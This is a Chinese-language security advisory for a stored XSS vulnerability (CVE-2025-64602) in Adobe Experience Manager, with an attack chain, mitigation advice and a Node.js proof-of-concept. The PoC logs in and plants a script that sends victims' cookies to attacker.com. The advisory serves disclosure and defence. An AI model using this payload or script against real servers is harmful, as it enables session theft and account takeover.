CVE-2025-64602 Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64602

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64602是Adobe Experience Manager中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响6.5.23及之前版本，CVSS评分5.4，属于中等严重程度。漏洞源于应用程序未能对用户输入进行充分的过滤和验证，导致恶意JavaScript脚本可以被注入到表单字段中并永久存储在服务器端。当其他用户访问包含恶意内容的页面时，注入的脚本会在其浏览器中执行，从而窃取会话Cookie、劫持用户账户、修改页面内容或进行其他恶意操作。攻击者需要具备低权限账户即可实施攻击，但需要诱导受害者访问特定页面或提交表单，具有一定的利用门槛。Adobe官方已发布安全公告(APSB25-115)并提供修复版本，建议用户尽快升级以消除安全风险。

技术细节

存储型XSS漏洞发生在Adobe Experience Manager的表单处理模块中。攻击者通过低权限账户登录系统后，可在表单输入字段(如文本框、文本区域等)中注入恶意JavaScript代码。由于应用程序未对用户输入进行HTML实体编码或输入验证，这些恶意脚本会被永久存储在数据库或内容仓库中。当其他用户(可能是管理员或普通访客)访问包含该恶意内容的页面时，浏览器会将其解析为可执行脚本并执行。攻击者可利用此漏洞获取受害者的会话令牌、凭据或敏感信息，甚至可通过社工手段进一步扩大攻击面。漏洞的利用条件包括：攻击者需拥有有效账户(低权限即可)、需找到可注入脚本的表单字段、需诱导受害者访问特定内容。修复方案是在数据输入时进行严格过滤，在数据输出时进行HTML编码。

攻击链分析

STEP 1

步骤1

攻击者获取Adobe Experience Manager的低权限账户，登录系统

STEP 2

步骤2

攻击者在表单输入字段中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>

STEP 3

步骤3

恶意脚本被存储在服务器端数据库或内容仓库中，形成持久化攻击向量

STEP 4

步骤4

受害者(普通用户或管理员)访问包含恶意内容的页面

STEP 5

步骤5

受害者的浏览器解析并执行注入的恶意脚本，窃取会话Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64602 Stored XSS PoC for Adobe Experience Manager
// Target: Adobe Experience Manager versions <= 6.5.23
// Vulnerability: Stored Cross-Site Scripting in form fields

const axios = require('axios');

async function exploitCVE202564602(targetUrl, username, password) {
    // Step 1: Authenticate with low-privileged account
    const loginUrl = `${targetUrl}/libs/granite/core/content/login.html`;
    const loginData = new URLSearchParams({
        '_charset_': 'utf-8',
        'j_username': username,
        'j_password': password
    });

    const session = axios.create({ withCredentials: true });
    await session.post(loginUrl, loginData.toString(), {
        headers: { 'Content-Type': 'application/x-www-form-urlencoded' }
    });

    // Step 2: Inject malicious XSS payload into form field
    const formUrl = `${targetUrl}/content/usergenerated/content/forms/af/test-form.html`;
    const xssPayload = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>';
    
    const exploitData = new URLSearchParams({
        './jcr:content/guideContainer/textField': xssPayload,
        './jcr:content/guideContainer/panelName': xssPayload,
        ':name': 'testForm',
        ':formPath': '/content/forms/af/test-form'
    });

    await session.post(formUrl, exploitData.toString(), {
        headers: { 'Content-Type': 'application/x-www-form-urlencoded' }
    });

    // Step 3: Trigger XSS when victim visits the page
    console.log('[+] XSS payload stored successfully');
    console.log('[+] Victim will trigger XSS when visiting:', formUrl);
    console.log('[+] Stolen cookies will be sent to: https://attacker.com/steal');
}

// Usage:
// node cve-2025-64602-poc.js https://vulnerable-aem-server.com admin password123

影响范围

Adobe Experience Manager 6.5.23及之前所有版本

Adobe Experience Manager Cloud Service (可能受影响，需确认官方通告)

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1)限制低权限用户对表单编辑功能的访问;2)部署WAF(Web应用防火墙)规则过滤XSS特征;3)实施严格的输入验证和输出编码;4)监控日志中的异常脚本标签;5)对管理员账户启用额外的身份验证机制。但这些措施仅为临时缓解，不能完全替代官方安全更新。